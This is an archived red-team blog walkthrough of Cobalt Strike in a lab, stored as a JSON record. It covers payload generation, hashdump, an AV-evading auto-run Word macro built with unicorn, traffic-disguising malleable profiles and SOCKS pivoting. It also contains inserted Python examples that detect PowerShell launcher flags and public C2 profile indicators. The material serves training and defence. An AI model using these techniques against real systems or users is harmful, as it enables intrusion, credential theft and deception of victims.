{
	"id": "71ea4985-06d9-401c-bc3b-f0a31eeba31b",
	"created_at": "2026-04-06T00:07:01.229619Z",
	"updated_at": "2026-04-10T03:36:13.905226Z",
	"deleted_at": null,
	"sha1_hash": "5be619397f2620f04c1da265d64104913ff07701",
	"title": "Cobalt Strike. Walkthrough for Red Teamers | Pen Test Partners",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6429667,
	"plain_text": "Cobalt Strike. Walkthrough for Red Teamers | Pen Test Partners\r\nBy PTP Admin\r\nPublished: 2019-04-15 · Archived: 2026-04-05 12:51:49 UTC\r\nRelated services\r\nRelated blogs\r\nWhat is Cobalt Strike?\r\nRaphael Mudge is the creator of Cobalt Strike (CS), around 2010 he released a tool titled Armitage, which is\r\ndescribed by wikipedia as a graphical cyber-attack management for the Metasploit Project, to put this more\r\nbluntly, Armitage is a gui that allows you to easily navigate and use MSF.\r\nFast forward to 2012 and Raphael released Armitage’s big brother: Cobalt Strike, what was initially perceived as\r\nan enhanced version of Armitage, would a few years later become regarded as one of the most used command and\r\ncontrol or as it’s commonly referred to as a C2 in red teaming today.\r\nRaphael is a legend in the industry, search for his name on YouTube alone, and you will find over 180+ videos.\r\nAnd he is someone I have personally looked up to in the sec world for many years.\r\nQuick note, IT security did not invent the term red team or C2, we have borrowed these terms from the United\r\nStates Army, which is referenced in 1999 as using the word C2 in a released field manual.\r\nSo, what’s this blog all about then? Well initially I thought it would be great to write a blog, showing people how\r\nto get a trial version of CS, install and test it out in your own lab, but I must admit I did start to waver half way\r\nthrough, and question why am I writing this, Raphael has released a YouTube video for nearly every function,\r\nproblem, and question you may ever have with CS, the freely available support is second to none, but then I\r\nthought, well it’s nice to research and write something from a fresh prospective, and secondly from a more selfish\r\npoint, repeating what we have learned helps ourselves to learn more. 
I will admit going back and testing with the trial version of CS has taught me more, and I hope this blog post is also of use to others.\r\nRight, dull intro over, let’s get hacking!\r\nIngredients required for this recipe:\r\n1 x Trial copy of Cobalt Strike\r\n1 x VMware or VirtualBox for the lab\r\n1 x Copy of Kali\r\n1 x Copy of Windows 7 or 10, both if you can afford the RAM\r\nThe ingredients can be sourced from the links directly below.\r\nCobalt Strike Trial – https://trial.cobaltstrike.com/\r\nVirtualBox – https://www.virtualbox.org/wiki/Downloads\r\nKali – https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/\r\nWindows VM/VB Images – https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 1 of 34\n\nIndex\r\nHow to start\r\nTesting CS in a lab\r\nUseful Basic CS Commands\r\nTo Kill an Implant\r\nUnicorn and Cobalt Payloads\r\nMalleable Profiles\r\nPivoting\r\nHow to start\r\nTo download your twenty-one day CS trial, browse to https://trial.cobaltstrike.com/. You are required to complete a form and submit a legitimate email address (unfortunately Google, Yahoo and other free mail providers are not accepted); you also need to provide a postal address, and for this requirement I used my employer’s address.\r\nAlso worth noting: Raphael is a busy person, so don’t expect to submit your details and get a trial copy that second. As a reference, I submitted for a trial copy and it took three days until I got an email with the download link.\r\nSo, once you receive your download link, what do you do? 
I will be honest, the process that follows is so simple it will surprise you.\r\nClick the hyperlink (or copy and paste the hyperlink to the download files into your browser of choice). You must then accept the end user licence, followed by choosing your download flavour.\r\nThis post is based on the Linux version, but I must admit the idea of running CS in Windows has caught my attention. I may write a follow-up covering that, but for now we’ll go with Linux:\r\nAfter clicking “Download Cobalt Strike now!” you will receive the following file in your selected download directory:\r\nNow, move the compressed file over to Kali Linux:\r\nTo access the contents of the compressed file, simply double click it, and once it opens define your chosen location and extract the contents there:\r\nFollowing the extraction, you can then cd to the extracted files via the terminal.\r\nroot@kali:~/Desktop# cd cobaltstrike/\r\nTo view the contents of the directory, run the ls command.\r\nroot@kali:~/Desktop/cobaltstrike# ls\r\nagscript cobaltstrike icon.jpg peclone releasenotes.txt third-party update.jar c2lint\r\nHere’s the contents of the extracted CS directory:\r\nThe first requirement is to start the Cobalt Strike team server. This is the C2 server that all compromised targets will beacon back to, and it is also what you connect to for management and control of compromised targets.\r\nTo start your CS team server, run the following command.\r\nroot@kali:~/Desktop/cobaltstrike# ./teamserver IP-address-of-your-server Your-selected-password\r\nThe screenshot below shows an extract of the CS team server being started for the first time. You will note that the trial is limited to twenty-one days and that the EICAR string is added to any traffic sent via the 
malleable profile; the trial is for lab use only. Malleable profiles will be detailed later in the blog post.\r\nYou are now ready to start the CS client, which provides the user with a GUI to connect to and manage their team server.\r\nTo start the CS client, simply run\r\nroot@kali:~/Desktop/cobaltstrike# ./cobaltstrike\r\nAfter clicking OK you will be prompted to create a connection profile. For the host IP address you can type in the loopback address, or, if the team server is not locally hosted, type in its IP address. The port (50050 by default) can be tweaked, and in the real world it should be. You can add your own username, but the default one of Neo is great, love the reference to The Matrix! And finally, enter the corresponding password as defined when you started the team server:\r\nAfter hitting “Connect” for the first time you will be prompted to verify the hash. This is the fingerprint of the team server’s SSL certificate, which is printed when the team server starts; check it matches, then click Yes. Do not skip this check: it is the only thing that tells you the client is talking to your own team server rather than an impostor in the middle.\r\nAnd that’s it from downloading to starting. You will now have a running trial version of Cobalt Strike, no messing around, no installing stuff, it’s all very simple and clean:\r\nTesting CS in a lab\r\nAnd now the games begin\r\nSo, you want to test CS out, how do you do it? First off, spin up a Windows VM; you can opt for a Windows 7 or 10 host. 
This VM will become your target machine, which you will run CS payloads on.\r\nI would recommend that while your VM is downloading, spinning up, updating or whatever it is doing, you take a look at the menus along the top of your CS client GUI and click through the options. It’s a trial version, so even if you break it (which I suspect you won’t, as it is very stable), just start again.\r\nQuick note – This would be a good point to take a snapshot of your Kali VM.\r\nGive me the shells!\r\nYep, I get it, you most likely just want to see the shells raining in, so let’s get to the fun part. To create your first payload, right click on Cobalt Strike (top left) and select Listeners. This allows you to define where your targets can dial back to:\r\nClicking Listeners will prompt you to fill in your requirements for this new listener: add the IP address of your team server and the required port, then click Save:\r\nIf you wish to Wireshark your traffic, I would recommend you opt for HTTP on port 80 over HTTPS, which by default will encrypt all your traffic flows. Note that even over plain HTTP the Beacon tasks and output carried inside the requests are still encrypted; what HTTP exposes to Wireshark is the shape of the traffic (URIs, headers, timing), which is exactly what the malleable profile section later in this post looks at.\r\nWhile setting up the listener you will be prompted for a domain. For internal lab use you can use an IP address, while on an offensive engagement you would replace the IP address with a domain of your choice:\r\nAfter clicking OK and saving your listener parameters you will see a tab open at the bottom, which details your listener settings:\r\nYou are now ready to create the payload. 
CS comes with an extensive payload creation offering; it covers nearly all commonly used techniques and the payloads are incredibly simple to create. Unfortunately (or fortunately, depending on your viewpoint), the stock payloads are widely signatured by common antivirus software, and in addition the trial version of CS injects the EICAR string into every payload. For a trial lab you can still use them (disable or exclude AV on the target VM first), and alternatively you can use third-party tooling such as Dave Kennedy’s amazing unicorn, which will take the CS generated payload and obfuscate the code, increasing the chance of the payload bypassing AV. This more advanced payload process is covered later in the blog post.\r\nTo create your first CS payload, click on Attacks / Packages / Payload Generator:\r\nSelect the listener you wish the payload to dial back to, followed by the output format. For this demo the PowerShell Command output has been opted for:\r\nIt creates a single PowerShell one-liner, which can be copied into a CMD or PowerShell terminal and run. 
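Before pasting that one-liner anywhere, it is worth knowing how to read it, because the form these launchers take (powershell.exe -nop -w hidden -encodedcommand <base64>) is also exactly what a blue team keys on in process-creation logs. The following is an added example, not code from the original post or from Cobalt Strike: it pulls the base64 out of -EncodedCommand, decodes it the way PowerShell does (UTF-16LE), and lists the launch flags. The command lines are constructed for the example, and the encoded script is a harmless Write-Host rather than a stager.

```python
import base64

# Added example (not from the original post): decode the -EncodedCommand argument of a
# PowerShell one-liner and list the launch flags a defender keys on. The command lines
# below are constructed for this example; the encoded script is a harmless Write-Host,
# not a Beacon stager.

def encode_command(script):
    # PowerShell's -EncodedCommand expects the script as UTF-16LE, then base64.
    return base64.b64encode(script.encode('utf-16-le')).decode('ascii')

def is_encoded_flag(token):
    # powershell.exe accepts -e, -ec or any unambiguous prefix of -EncodedCommand.
    if not token.startswith('-'):
        return False
    t = token.lstrip('-').lower()
    return t in ('e', 'ec') or (len(t) >= 3 and 'encodedcommand'.startswith(t))

def decode_encoded_command(cmdline):
    # Returns the decoded script, or None if there is no (valid) encoded command.
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_flag(tok):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode('utf-16-le')
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def triage(cmdline):
    # Collects the flags that, together, mark an unattended hidden launcher.
    tokens = cmdline.lower().split()
    indicators = []
    if '-nop' in tokens or '-noprofile' in tokens:
        indicators.append('no profile')
    for i, t in enumerate(tokens[:-1]):
        if t in ('-w', '-win', '-window', '-windowstyle') and tokens[i + 1] == 'hidden':
            indicators.append('hidden window')
        if t in ('-ep', '-exec', '-executionpolicy') and tokens[i + 1] == 'bypass':
            indicators.append('execution policy bypass')
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        indicators.append('encoded command')
    return {'indicators': indicators, 'decoded': decoded, 'suspicious': len(indicators) >= 2}

# Constructed sample process-creation command lines for this example.
SAMPLE_COMMAND_LINES = [
    'powershell.exe -nop -w hidden -encodedcommand ' + encode_command('Write-Host lab-test'),
    'powershell.exe -ExecutionPolicy Bypass -File backup.ps1',
    'powershell.exe -Command Get-Date',
]

def triage_all(lines=SAMPLE_COMMAND_LINES):
    return [triage(line) for line in lines]

if __name__ == '__main__':
    for line, result in zip(SAMPLE_COMMAND_LINES, triage_all()):
        print(line[:48], result['indicators'], result['decoded'])
```

Run it against the payload.txt the generator wrote and you will see the decoded stager script in clear; run it against a process-creation log and the first sample line is the only one that comes back suspicious, because it is the combination of flags, not any single one, that distinguishes a launcher from an admin running a script.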
This payload can also be placed into a .bat file and used in an OLE attack, which I may cover later on in this post.\r\nAfter clicking Generate you will be prompted for a location to save the payload to:\r\nOnce you have downloaded the payload, open it using gedit or your preferred editor:\r\nNote – I have seen formatting issues when using nano and the like to copy and paste payloads.\r\nroot@kali:~/Desktop/cobaltstrike# gedit /root/Desktop/Payloads/payload.txt\r\nHighlight all of the payload text (Ctrl+a), copy it (Ctrl+c) and move it across to your Windows machine, then open CMD, paste it in (Ctrl+v) and finally press Enter:\r\nA few seconds later you should see the Windows machine dialling back and you should receive your session:\r\nIt is worth noting at this point the * after the username; this reveals that the session is running in a high-integrity (elevated, administrator-level) process. It does not by itself mean SYSTEM, but it is enough for the admin-only actions later in this post, such as hashdump. 
Typically you would not gain access to such a position from your initial foothold, but for lab use it doesn’t hurt to start at this level.\r\nTo be able to send any commands to the target you are required to interact with the Beacon. To do this, click on the chosen target and select Interact:\r\nThis will open a new tab and you can then input your desired commands at the beacon prompt:\r\nDuring a red team engagement you control the rate at which you communicate to and from the target host. Typically you slow this communication down, aiming to reduce the chance of your flows being spotted by the blue team, but while working in a lab environment you may find the slow responses to requests frustrating. You can set the Beacon to check in continuously by typing sleep 0 and pressing Enter (the command takes seconds and an optional jitter percentage, e.g. sleep 60 20; a constant check-in interval is itself a strong network indicator, so sleep 0 is for the lab only):\r\nSecondly, all cmd / PowerShell commands can be used natively within Beacon, but you are required to prefix them with the word “shell” for Beacon to understand your request. Note that shell runs the command via cmd.exe /c on the target, so each one spawns a visible child process under your Beacon’s host process.\r\nThe screenshot directly below shows the command error resulting from an attempt to run the cmd command “ipconfig” without prefixing it with shell:\r\nRepeating the above command request, this time prefixing it with ‘shell’, results in the command being sent to the target machine and the reply being received, as can be seen in this screenshot:\r\nWhile initially having to use the “shell” command feels unnatural, you quickly become used to it.\r\nUseful Basic CS commands\r\nScreenshot\r\nThe screenshot function allows you to take a snapshot of the target’s desktop. You should become comfortable using this function, as targets often leave open spreadsheets and Outlook mails, and it’s not unheard of to spot a 
useful username or even a password via a screenshot on an active engagement.\r\nTo take a screenshot of a target’s desktop, right click on the machine in question and select Explore / Screenshot, or alternatively just type screenshot at the beacon prompt and press Enter:\r\nAll commands and additional data collected by CS, such as the screenshot JPG files, are stored in the team server’s logs directory, under a folder per day and per target IP, which in this example was located at /root/Desktop/cobaltstrike/logs/190329/192.168.1.20/screenshots:\r\nThere is a misconception that CS is very GUI driven. It can be, but alternatively, if you wish, you can use the command prompt just as well; it comes down to user preference.\r\nProcess List\r\nTo view the target’s running process list, right click on the host and select Explore / Process List:\r\nA tab will open detailing the running processes:\r\nIf you want to inject into another process, and have sufficient rights on the target host for that process, highlight the process you want to inject into. You will then be prompted to define the listener; select the desired one and click Inject:\r\nBelow shows the result of injecting into a different process: a new session is started on a different PID. This can be useful for temporary resilience, as if the initial process is closed your secondary one should still be active.\r\nHashdump\r\nSeems some commands from MSF have survived ;0) Typing hashdump when running with administrator privileges results in the target’s local account hashes being collected and presented, as can be seen in this screenshot:\r\nTo kill an implant\r\nYou can remove a target once you have finished with it by 
performing the following process.\r\nClick on Session / Exit:\r\n…or alternatively, interact with the Beacon you wish to remove and type exit. Note that exit only ends that one Beacon; any further sessions you injected or spawned from it keep running and have to be exited separately:\r\nYou can now remove the target from your CS client window, simply click Session / Remove:\r\n…and the target is gone:\r\nUnicorn and Cobalt payloads\r\nLet’s go deeper\r\nSo, say you want to simulate a more sophisticated payload creation technique?\r\nThere are a few options, but the quickest is TrustedSec’s unicorn: https://github.com/trustedsec/unicorn\r\nQuick note: Unicorn, as listed on the GitHub page: “Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory.”\r\nPersonally, I have used it for a few years, and I will happily say I’m a fan of it, but (and there always is a small but) with every other update or so the odd thing does break. Before anyone complains: unicorn is free, it’s amazing and the level of support and commitment David Kennedy and his team put into it is incredible.\r\nA neat tip I learned recently (respect to @ZephrFish for this tip): if you suspect the version of unicorn you are using is broken in some way, you can download the previous versions here: https://github.com/trustedsec/unicorn/releases. An example of this is that versions 3.6.8 to 3.6.11 look to no longer support Windows 7, which is not ideal as this ageing OS is still prevalent. The unicorn maintainers have been informed of this (https://github.com/trustedsec/unicorn/issues/118) and I suspect the next release will address it, but for the next blog section, if you wish to use Windows 7 as a target, you will have to opt for unicorn version 3.6.7 
(https://github.com/trustedsec/unicorn/releases/tag/3.6.7) for it to work.\r\nBelow details how to git clone the most recent version of unicorn:\r\nroot@kali:~/Desktop# git clone https://github.com/trustedsec/unicorn.git\r\nCloning into 'unicorn'...\r\nremote: Enumerating objects: 50, done.\r\nremote: Counting objects: 100% (50/50), done.\r\nremote: Compressing objects: 100% (22/22), done.\r\nremote: Total 538 (delta 30), reused 47 (delta 28), pack-reused 488\r\nReceiving objects: 100% (538/538), 271.34 KiB | 723.00 KiB/s, done.\r\nResolving deltas: 100% (349/349), done.\r\nThe following will detail how to use unicorn with CS.\r\nMove into the unicorn directory:\r\nroot@kali:~/Desktop# cd unicorn/\r\nReview all files in the directory:\r\nroot@kali:~/Desktop/unicorn# ls\r\nCHANGELOG.txt CREDITS.txt LICENSE.txt README.md templates unicorn.py\r\nRunning unicorn with no arguments prints its usage, showing all possible commands:\r\nroot@kali:~/Desktop/unicorn# ./unicorn.py\r\nCS and Unicorn Macro Fun\r\nThe following section details using Unicorn with a C# CS payload to make a VBA Office macro with an increased chance of bypassing AV.\r\nFor lab use I opt for Office 2010; this version of Office is still a widely used flavour in the wild and as such makes a good base for testing.\r\nBy default the Office ribbon does not show the Developer tab, which is required for the creation of macros, so the section directly below details how to enable it.\r\nOpen MS Word and go to File / Options / Customise Ribbon, and make sure the Developer tab is ticked under Customise Ribbon:\r\nAn alternative way to enable the Developer tab is to right click on any space on the ribbon, select Customize the 
Ribbon, and tick Developer:\r\nTicking the Developer option and saving should now show the Developer tab at the end of the ribbon:\r\nClick on the Developer tab, then on Visual Basic:\r\nThis will start Visual Basic for Applications (VBA). Right click on ThisDocument / Insert / Module to create the Module1 (Code) area:\r\nThis will create the Document1 – Module1 (Code) area, which is where you paste your Cobalt Strike / Unicorn VBA macro:\r\nIt is very simple to make the C# payload which is required as the base of your macro payload in CS; the following section details this process.\r\nClick on Attacks / Packages / Payload Generator.\r\nSelect your listener and set the output to C#:\r\nSave the payload in its default format of payload.cs:\r\nCS will prompt you with where it has been saved:\r\nNow take a note of the payload location, move over to the terminal and into the unicorn directory, and by referencing the downloaded payload.cs file you can create a uniquely tweaked VBA macro automatically. 
The syntax directly below shows all you require to perform this.\r\npython unicorn.py /root/Desktop/Payloads/payload.cs cs macro\r\nThe result of the above command is the creation of a file titled “powershell_attack.txt” in your unicorn directory, which contains a VBA Office macro script:\r\nOpen “powershell_attack.txt” using your preferred editor (gedit, because I’m “hu-man” ;0)) and copy the full contents: Ctrl+a, Ctrl+c.\r\nMove back to the Windows VM and, in the open Word Document1 – Module1 (Code) area, paste the unicorn macro in full. An extract of this can be seen in the screenshot directly below:\r\nFinal tweak: you need to delete the underscore from Auto_Open on the first line, as can be seen below. Without doing this the macro will not auto-run when the document is opened: Word looks for a macro named AutoOpen, whereas Auto_Open (what unicorn emits) is the name Excel uses. Remember too that the document has to be saved in a macro-enabled format, and that the target still has to click through the macro security warning before anything runs.\r\nTo test the macro, you can run it by clicking on the “run” arrow on the toolbar:\r\nThis should make the Word document move from the developer window back to the default work page, and you will see an error. This error is intentional and can be tweaked in the outputted “powershell_attack.txt”. The result of the error is that it forces the document to close when OK is clicked; this makes it trickier for a standard user to nose around the document, and can even result in the user forwarding it to others to ask if they can open it. Double shells ;0)\r\nIf all works as expected you should receive the session back in CS.\r\nMalleable profiles\r\nMalleable C2 is defined by Raphael as a domain specific language to redefine indicators in Beacon’s communication. 
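Before going into the profiles themselves, it helps to see why redefining those indicators is only half the job. The following is an added example, not code from the original post or from the Malleable-C2-Profiles repository, written from the defender’s side: a request that reuses a public sample profile verbatim (the amazon profile, whose URIs, Host and User-Agent appear in the c2lint output later in this section) is trivially fingerprinted, and a Host header naming a public site on a connection to a private lab address (the team server) gives the game away whatever the profile says. The indicator values are the ones printed by c2lint; the captured requests, the destination addresses and the internal naming convention are constructed for the example.

```python
import ipaddress

# Added example, not code from the original post or from the Malleable-C2-Profiles
# repository. Defender's view of a public malleable profile: match the profile's own
# indicators, and flag a public Host header on a private destination. The indicator
# values are those printed by c2lint for amazon.profile; the log entries are constructed.

PUBLIC_PROFILE_INDICATORS = {
    'amazon': {
        'get_uri': '/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books',
        'post_uri_prefix': '/N4215/adj/amzn.us.sr.aps',
        'host': 'www.amazon.com',
        'user_agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
    },
}

# Constructed organisational naming convention: internal names are expected on private IPs.
INTERNAL_SUFFIXES = ('.local', '.internal', '.lan')

# Constructed lab captures: destination IP plus the request as Wireshark's Follow shows it.
SAMPLE_REQUESTS = [
    {'dst_ip': '192.168.1.18', 'lines': [
        'GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1',
        'Accept: */*',
        'Host: www.amazon.com',
        'Cookie: skin=noskin;session-token=NbpB9E/faGd2tZXtRbXh9g==csm-hit=s-24KU11BB82RZSYGJ3BDK|141989901299',
        'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
    ]},
    {'dst_ip': '192.168.1.18', 'lines': [
        'POST /N4215/adj/amzn.us.sr.aps?sz=160x600&oe=oe&sn=43985&s=3717&dc_ref=http%3A%2F%2Fwww.amazon.com HTTP/1.1',
        'Accept: */*',
        'Content-Type: text/xml',
        'X-Requested-With: XMLHttpRequest',
        'Host: www.amazon.com',
        'Content-Length: 24',
        'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
    ]},
    {'dst_ip': '10.0.0.5', 'lines': [
        'GET /index.html HTTP/1.1',
        'Host: wiki.corp.local',
        'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0',
    ]},
    {'dst_ip': '93.184.216.34', 'lines': [
        'GET /news HTTP/1.1',
        'Host: www.example.org',
        'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0',
    ]},
]

def parse_request(lines):
    # Request line plus headers, header names lower-cased for lookup.
    method, uri, _version = lines[0].split(' ', 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(':')
        headers[name.strip().lower()] = value.strip()
    return {'method': method, 'uri': uri, 'headers': headers}

def host_destination_mismatch(host, dst_ip):
    # A public-looking Host on a private destination cannot be the real site. On a real
    # proxy, compare dst_ip against the proxy's own DNS answer for the Host instead.
    if not host or host.endswith(INTERNAL_SUFFIXES):
        return False
    return ipaddress.ip_address(dst_ip).is_private

def check_request(entry):
    req = parse_request(entry['lines'])
    h = req['headers']
    reasons = []
    for name, ind in PUBLIC_PROFILE_INDICATORS.items():
        if req['method'] == 'GET' and req['uri'] == ind['get_uri']:
            reasons.append('GET URI matches public ' + name + ' profile')
        if req['method'] == 'POST' and req['uri'].startswith(ind['post_uri_prefix']):
            reasons.append('POST URI matches public ' + name + ' profile')
        if h.get('host') == ind['host'] and h.get('user-agent') == ind['user_agent']:
            reasons.append('Host and User-Agent match public ' + name + ' profile')
    if host_destination_mismatch(h.get('host'), entry['dst_ip']):
        reasons.append('Host ' + h['host'] + ' but destination ' + entry['dst_ip'] + ' is a private address')
    return reasons

def analyse(entries=SAMPLE_REQUESTS):
    return [{'dst_ip': e['dst_ip'], 'reasons': check_request(e)} for e in entries]

if __name__ == '__main__':
    for r in analyse():
        print(r['dst_ip'], r['reasons'] or 'clean')
```

The two Beacon requests each come back with three reasons, the two ordinary browser requests with none. The practical lesson for the red team side is the mirror image: treat the public profiles as templates to learn the language from, change every indicator before an engagement, and make sure the Host header you claim actually resolves to the redirector the Beacon talks to.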
Put bluntly, it allows you to shape the C2 traffic (the URIs, headers and User-Agent, how Beacon’s data is encoded into requests and responses, and, as the c2lint output below shows, host-side behaviour such as which process is spawned for post-exploitation jobs) so that it blends into normal traffic under the disguise of being a legitimate source.\r\nTake a look at https://github.com/rsmudge/Malleable-C2-Profiles as it details some profiles created by Raphael that are available for you to use.\r\nTo download the above profiles in Kali simply git clone the repository by performing the following.\r\nroot@kali:~/Desktop/cobaltstrike# git clone https://github.com/rsmudge/Malleable-C2-Profiles.git\r\nCloning into 'Malleable-C2-Profiles'...\r\nremote: Enumerating objects: 221, done.\r\nremote: Total 221 (delta 0), reused 0 (delta 0), pack-reused 221\r\nReceiving objects: 100% (221/221), 49.16 KiB | 535.00 KiB/s, done.\r\nResolving deltas: 100% (113/113), done.\r\nTo view all files in the directory simply run ls.\r\nroot@kali:~/Desktop/cobaltstrike# ls\r\nagscript c2lint cobaltstrike cobaltstrike.jar cobaltstrike.store data icon.jpg license.pdf lo\r\nThe c2lint program checks the syntax of the defined malleable profile and exercises its transforms. It is recommended that you do this with each profile you wish to use to verify that it will work, and that you read its [!] warnings, which flag OPSEC problems (such as the default spawnto choice) that a syntactically valid profile can still have.\r\nroot@kali:~/Desktop/cobaltstrike# ./c2lint Malleable-C2-Profiles/normal/amazon.profile\r\n[+] Profile compiled OK\r\nhttp-get\r\n--------\r\nGET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1\r\nAccept: */*\r\nHost: www.amazon.com\r\nCookie: skin=noskin;session-token=NbpB9E/faGd2tZXtRbXh9g==csm-hit=s-24KU11BB82RZSYGJ3BDK|141989901299\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nHTTP/1.1 200 OK\r\nServer: Server\r\nx-amz-id-1: THKUYEZKCKPGY5T42PZT\r\nx-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=\r\nX-Frame-Options: SAMEORIGIN\r\nContent-Encoding: gzip\r\nContent-Length: 64\r\n.7..y...........0%.ARW.K..h.H.p=.......cB.. 
..|.d.W7f......CO$..\r\nhttp-post\r\n---------\r\nPOST /N4215/adj/amzn.us.sr.aps?sz=160x600\u0026oe=oe\u0026sn=43985\u0026s=3717\u0026dc_ref=http%3A%2F%2Fwww.amazon.com HT\r\nAccept: */*\r\nContent-Type: text/xml\r\nX-Requested-With: XMLHttpRequest\r\nHost: www.amazon.com\r\nContent-Length: 24\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n66/7wTq/D3ql+bBKT4i3rQ==\r\nHTTP/1.1 200 OK\r\nServer: Server\r\nx-amz-id-1: THK9YEZJCKPGY5T42OZT\r\nx-amz-id-2: a21JZ1xrNDNtdGRsa219bGV3YW85amZuZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo=\r\nX-Frame-Options: SAMEORIGIN\r\nx-ua-compatible: IE=edge\r\nContent-Length: 0\r\n[+] POST 3x check passed\r\n[+] .http-get.server.output size is good\r\n[+] .http-get.client size is good\r\n[+] .http-post.client size is good\r\n[+] .http-get.client.metadata transform+mangle+recover passed (1 byte[s])\r\n[+] .http-get.client.metadata transform+mangle+recover passed (100 byte[s])\r\n[+] .http-get.client.metadata transform+mangle+recover passed (128 byte[s])\r\n[+] .http-get.client.metadata transform+mangle+recover passed (256 byte[s])\r\n[+] .http-get.server.output transform+mangle+recover passed (0 byte[s])\r\n[+] .http-get.server.output transform+mangle+recover passed (1 byte[s])\r\n[+] .http-get.server.output transform+mangle+recover passed (48248 byte[s])\r\n[+] .http-get.server.output transform+mangle+recover passed (1048576 byte[s])\r\n[+] .http-post.client.id transform+mangle+recover passed (4 byte[s])\r\n[+] .http-post.client.output transform+mangle+recover passed (0 byte[s])\r\n[+] .http-post.client.output transform+mangle+recover passed (1 byte[s])\r\n[+] .http-post.client.output POSTs results\r\n[+] .http-post.client.output transform+mangle+recover passed (48248 byte[s])\r\n[+] .http-post.client.output transform+mangle+recover passed (1048576 byte[s])\r\n[+] .host_stage: Will host payload stage 
(HTTP/DNS)\r\n[!] .spawnto_x86 is '%windir%\\syswow64\\rundll32.exe'. This is a *really* bad OPSEC choice.\r\n[!] .spawnto_x64 is '%windir%\\sysnative\\rundll32.exe'. This is a *really* bad OPSEC choice.\r\n[!] .code-signer.keystore is missing. Will not sign executables and DLLs\r\n[!] .https-certificate options are missing [will use built-in SSL cert]\r\nroot@kali:~/Desktop/cobaltstrike#\r\nThe profile compiles, but the [!] lines are worth acting on before any real engagement: rundll32.exe started with no arguments as the spawnto process is a well-known Cobalt Strike indicator, and the built-in SSL certificate is equally well known, so a profile of your own should set spawnto_x86 / spawnto_x64 to something that makes sense on the target and supply https-certificate and code-signer settings.\r\nYou load the defined malleable profile at the same time as starting the CS team server; this is accomplished by passing it as the third argument, as follows.\r\nroot@kali:~/Desktop/cobaltstrike# ./teamserver 192.168.1.18 TestmeUP3 Malleable-C2-Profiles/normal/a\r\nOnce it’s loaded, start the Cobalt Strike client as mentioned earlier in this post to get access to the server.\r\nSet the listener to HTTP so the traffic is sent unencrypted; this will allow you to view the traffic with Wireshark in the lab environment.\r\nHere’s the listener set to HTTP:\r\nGo to your Windows host and install Wireshark. Once installed, start it listening on the interface that connects to your virtual lab.\r\nThen in CS create some traffic by running a command such as “shell ipconfig” against the target machine:\r\nOn the target machine filter Wireshark to look for HTTP traffic, then right click on a GET request and select Follow:\r\nThis screenshot shows the results of using the amazon malleable profile:\r\nThe remainder of this section details the results of trying different malleable profiles out.\r\nHere are the results identified while using the Gmail malleable profile:\r\nAnd finally, using the Bing malleable profile:\r\nPivoting\r\nWith CS most users opt to live off the land with CMD or PowerShell commands and scripts, or, as is becoming more popular, C#, but 
there are times when you just miss your old school techniques and tools, and CS allows you to use these via the use of a SOCKS server.\r\nThe following section details using other tools via CS.\r\nTo enable the SOCKS server, click on Pivoting followed by Socks Server:\r\nThis will result in you being prompted to provide a port to run the server on. It will fill this in with a default for you, and for this demo I use that setting.\r\nAlternatively, you can type socks followed by your chosen port at the beacon prompt and press Enter:\r\nTwo things to keep in mind: the SOCKS port is opened on the team server host, not on your client, and it carries no authentication, so on a real engagement restrict who can reach it; and everything you push through it travels at the Beacon’s sleep rate, so drop the sleep (sleep 0 in the lab) or the pivot will crawl.\r\nNow, in a Kali terminal, open proxychains.conf and set the socks4 127.0.0.1 entry’s port number to match the one you set in CS (for this run that line reads socks4 127.0.0.1 37279; if your team server is not on the Kali box, use the team server’s IP instead of 127.0.0.1).\r\nroot@kali:~/Desktop/cobaltstrike# gedit /etc/proxychains.conf\r\nSave, and then you can use proxychains with your desired tool.\r\nFor the following demo I will show using RDP through the compromised target and pivoting to a connected Windows 10 box.\r\nroot@kali:~/Desktop/cobaltstrike# proxychains rdesktop 192.168.1.17\r\nProxyChains-3.1 (http://proxychains.sf.net)\r\nAutoselected keyboard map en-gb\r\n|S-chain|-\u003c\u003e-127.0.0.1:37279-\u003c\u003e\u003c\u003e-192.168.1.17:3389-\u003c\u003e\u003c\u003e-OK\r\nERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?\r\n|S-chain|-\u003c\u003e-127.0.0.1:37279-\u003c\u003e\u003c\u003e-192.168.1.17:3389-\u003c\u003e\u003c\u003e-OK\r\nConnection established using SSL.\r\nThe CredSSP error is rdesktop failing Network Level Authentication (it has no Kerberos ticket to offer); it then reconnects through the same SOCKS chain and falls back to a plain TLS session, which is why the second chain line also reports OK and the connection is established.\r\nSource: https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/",
	"extraction_quality": 1,
